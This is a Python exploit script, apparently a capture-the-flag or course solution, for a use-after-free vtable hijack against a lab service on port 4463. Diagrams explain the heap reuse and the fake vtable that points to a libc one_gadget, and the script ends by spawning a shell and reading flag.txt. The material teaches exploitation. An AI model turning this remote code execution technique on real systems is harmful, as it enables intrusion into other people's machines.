import sys
import struct
import socket

def p(a):
    return struct.pack('Q', a)

def recvline(s):
    b = b''
    while not b'\n' in b:
        b += s.recv(100)
    return b

def recvn(s, n):
    b = b''
    while len(b) < 8:
        b += s.recv(8 - len(b))
    return b

host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
port = 4463

# this binary does not contain the __free_hook, but it allocates C++ objects
# that define virtual functions. These objects will have a vtable pointer in
# their first 8 bytes, pointing to the table of pointers to virtual functions.
# By creating a fake vtable we can redirect execution where we want. By using a
# one_gadget, we also do not need to control the arguments.
#
# To install our fake vtable we exploit the user-after-free bug in the program:
# addresses of created objects are not reset when the objects are deleted.
#
# Note that, this time, we are not exploiting or overwriting heap meta-data, so
# we also omit to draw the chunk headers below.
#
# Assume we first create an 'A' object with type, e.g., Base (command 'oAb..').
# This will lead to:
#
#        objects[]                                                        
#     |            |                                  B::vtable           
#     +------------+          +------------+        +----------+          
# 'A' |            |--------->|   vtable   | ------>|          |---> B::foo()
#     +------------+          +------------+        +----------+        
#     |            |          |    ...     |                                            
#                                                                         
#                                                                         
# Now we delete the object 'A' and create a *key* of the same size as an
# object. The memory of the 'A' object will be reused for the key's value, but
# objecs['A'] will still contain a pointer to it:                                                                       
#                                                                         
#
#        objects[]                                                        
#     |            |                                  B::vtable           
#     +------------+          +------------+        +----------+          
# 'A' |            |---+----->|   vtable   | ------>|          |---> B::foo()
#     +------------+   |      +------------+        +----------+        
#     |            |   |      |    ...     |                                            
#                      |                                                  
#                      |                                                  
#     |  values[]  |   |                                                  
#     +------------+   |                                                  
# 'K' |            |---+                                                  
#     +------------+                                                      
#     |            |                                                      
#                                                                         
# The value assigned to key 'K' will overwrite the vtable pointer inside object 'A'.
# We only need to create a new key, 'V' say, that contains a fake vtable and let
# 'A' point to it:
#                                                                         
#
#        objects[]                                                        
#     |            |                                  B::vtable           
#     +------------+          +------------+        +----------+          
# 'A' |            |---+----->|   vtable   |---+    |          |---> B::foo()
#     +------------+   |      +------------+   |    +----------+        
#     |            |   |      |    ...     |   |                                        
#                      |                       |                          
#                      |                       |                          
#     |  values[]  |   |                       |                          
#     +------------+   |                       |                          
# 'K' |            |---+                       |                          
#     +------------+     +---------------------+                          
#     |            |     |                                                
#     ~            ~     |
#     |            |     |      fake vtable                               
#     +------------+     |    +------------+                              
# 'V' |            |-----+--->|            |-----> one gadget             
#     +------------+          +------------+                              
#     |            |                                                                    
#                                                                         

# The process runs with ASLR disabled. We assume that we can obtain the load
# address of the libc by running a copy of the program in a similar system.
# Otherwise, the address can be leaked using the same method used for myheap2
# (see also objects2)
#
# Note: to check that the gadget's constrains are satisfied, you can set the
# one_gadget var to an invalid address (e.g., 0xdeadbeef) and run the server
# in the debugger. The program will stop while trying to jump to the invalid
# address, so that you can examine the registers and the stack.
one_gadget = 0x00007ffff7c38000 + 0xcbd20

s = socket.create_connection((host, port))
# create a fake vtable pointing to the one_gadget
s.send(b'cV08')
vtable_addr = int(recvline(s).decode(), 0)
s.send(b'aV' + p(one_gadget))

# setup the user-after-free bug
s.send(b'oAb00')
s.send(b'DA')
a1 = recvline(s)
s.send(b'cK16')
a2 = recvline(s)
# just for debugging: check that 'K' is indeed reusing the address of 'A'
if (a1 != a2):
    print("unexpected error: %r != %r" % (a1, a2))
    exit()

# redirect the vtable pointer of the 'A' object to our fake vtable
s.send(b'aK' + p(vtable_addr) + p(0))

# trigger the user-after-free bug
s.send(b'uA')

# now we should be talking to a shell. Capture the flag
s.send(b'/bin/cat flag.txt\n')
sys.stdout.buffer.write(recvline(s))
